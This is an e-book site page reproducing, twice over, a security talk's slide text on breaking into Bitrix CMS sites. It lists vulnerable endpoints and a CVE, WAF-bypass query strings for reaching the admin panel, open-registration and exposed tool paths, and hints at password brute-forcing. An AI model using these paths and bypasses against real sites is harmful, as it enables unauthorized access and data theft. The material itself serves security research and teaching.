Anton Lopanitsyn - «Выйди и зайди нормально!»
Название: | «Выйди и зайди нормально!» | |
Автор: | Anton Lopanitsyn | |
Жанр: | Интернет | |
Изадано в серии: | неизвестно | |
Издательство: | неизвестно | |
Год издания: | - | |
ISBN: | неизвестно | |
Отзывы: | Комментировать | |
Рейтинг: | ||
Поделись книгой с друзьями! Помощь сайту: донат на оплату сервера |
Краткое содержание книги "«Выйди и зайди нормально!»"
(То ли слайды для презентации, то ли шпаргалка. Тема - как взломать сайт на Битриксе. Кому в наши дни нужен Битрикс? Тащат на Флибу чёрт знает что).
Читаем онлайн "«Выйди и зайди нормально!»". Главная страница.
- 1
«Выйди и зайди нормально!»
Anton Lopanitsyn
КТО Я?
• Тыкаю кавычки
(атакую).
• Запрещаю тыкать
кавычки (защищаю).
• Пытаюсь в стартапы по
ИБ (passleak.com,
antibot.ru) – но
нехватает денюшков
• Исследую,
развлекаюсь,
рассказываю об этом
Bo0oM
Как обычно ломают Bitrix?
• restore.php
Система восстановления файлов в Bitrix
• vote/uf.php
CVE-2022-27228
• html_editor_action.php
CVE-???, вроде ту же самую дали ей)))0)
• уязвимости в самописных модулях не покрытых waf’ом
Ну тут как будто без комментариев
Исправления
Исправления
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL
/pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL
/pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
/pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/
/pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo
/bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c
ustom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/
my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs
cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/
public/ru/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/
public/ru/board/my/index.php?register=yes
/bitrix/modules/forum/install/admin/forum_index.php
Install
Даже если взять и попасть в админку не удалось
•
•
•
•
•
•
Можно почитать отзывы и обратную связь
Посмотреть списки рассылок
Собрать используемые плагины изнутри
Посмотреть настройки
Побрутить пароли
Собрать дополнительную информацию
Tools
/bitrix/tools/catalog_export/yandex_detail.php
/bitrix/tools/sale/discount_reindex.php
/bitrix/tools/sale/basket_discount_convert.php
Tools
Tools
/bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components
/bitrix/components/bitrix/desktop/admin_settings.php
/bitrix/components/bitrix/player/player_playlist_edit.php
/bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools
/bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
Никто не знает, что тут
--">
Anton Lopanitsyn
КТО Я?
• Тыкаю кавычки
(атакую).
• Запрещаю тыкать
кавычки (защищаю).
• Пытаюсь в стартапы по
ИБ (passleak.com,
antibot.ru) – но
нехватает денюшков
• Исследую,
развлекаюсь,
рассказываю об этом
Bo0oM
Как обычно ломают Bitrix?
• restore.php
Система восстановления файлов в Bitrix
• vote/uf.php
CVE-2022-27228
• html_editor_action.php
CVE-???, вроде ту же самую дали ей)))0)
• уязвимости в самописных модулях не покрытых waf’ом
Ну тут как будто без комментариев
Исправления
Исправления
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL
/pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL
/pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
/pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/
/pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo
/bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c
ustom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/
my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs
cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/
public/ru/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/
public/ru/board/my/index.php?register=yes
/bitrix/modules/forum/install/admin/forum_index.php
Install
Даже если взять и попасть в админку не удалось
•
•
•
•
•
•
Можно почитать отзывы и обратную связь
Посмотреть списки рассылок
Собрать используемые плагины изнутри
Посмотреть настройки
Побрутить пароли
Собрать дополнительную информацию
Tools
/bitrix/tools/catalog_export/yandex_detail.php
/bitrix/tools/sale/discount_reindex.php
/bitrix/tools/sale/basket_discount_convert.php
Tools
Tools
/bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components
/bitrix/components/bitrix/desktop/admin_settings.php
/bitrix/components/bitrix/player/player_playlist_edit.php
/bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools
/bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
Никто не знает, что тут
--">
- 1
Книги схожие с ««Выйди и зайди нормально!»» по жанру, серии, автору или названию:
Алекс Сучжон-Ким Пан - Укрощение цифровой обезьяны. Как избавиться от интернет-зависимости Жанр: Интернет Год издания: 2014 |
А Ш Левин - Интернет для людей старшего возраста Жанр: Интернет Год издания: 2014 |